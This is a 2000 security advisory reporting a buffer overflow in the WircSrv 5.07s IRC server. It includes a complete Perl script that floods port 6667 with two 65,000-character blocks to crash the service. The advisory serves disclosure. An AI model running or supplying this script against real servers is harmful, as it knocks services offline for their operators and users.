WircSrv Subject to DoS

 
WircSrv Subject to Denial of Service
Reported July 10, 2000 by
USSRLabs

VERSIONS AFFECTED
WircSrv 5.07s

DESCRIPTION

The WircSrv IRC Server product contains an unchecked buffer that could lead to denial of service attacks against the service. By sending a command string that is approximately 65000 characters in length, a buffer will overflow and crash the service.

DEMONSTRATION

- -------------------------Start File--------------------
#!/usr/bin/perl
#########################################################
# Exploit by USSRLabs www.ussrback.com
# WircSrv Version 5.07s Remote DoS attack
# send 2 64k blocks of data causes the server to crash.
#########################################################
use Getopt::Std;
use Socket;

getopts("s:", \%args);
if(!defined($args\{s\}))\{&usage;\}

my($serv,$port,$foo,$number,$data,$buf,$in_addr,$paddr,$proto);

$foo = "A"; # this is the NOP
$number = "65000"; # this is the total number of NOP
$data .= $foo x $number; # result of $foo times $number
$serv = $args\{s\}; # remote server
$port = 6667; # remote port, default is 6667
$buf = "$data"; # issue this response to the server

$in_addr = (gethostbyname($serv))\[4\] || die("Error: $!\n");
$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");
$proto = getprotobyname("tcp") || die("Error: $!\n");

socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");
connect(S, $paddr) ||die ("Error: $!");
select(S); $| = 1; select(STDOUT);
print S "$buf";
print S "$buf";
print("Data has been successfully sent to $serv\n");

sub usage \{die("\n\nExploit by USSRLabs www.ussrback.com\nWircSrv
Version 5.07s
Remote DoS attack\nsend 2 64k blocks of data causes the server to
crash.\n -s server_ip\n\n");\}
- -------------------------End File----------------------

VENDOR RESPONSE

The vendor is aware of the problem, however response was known at the time of this writing.

CREDITS
Discovered and reported by USSRLabs

Hide comments

Comments

  • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.
Publish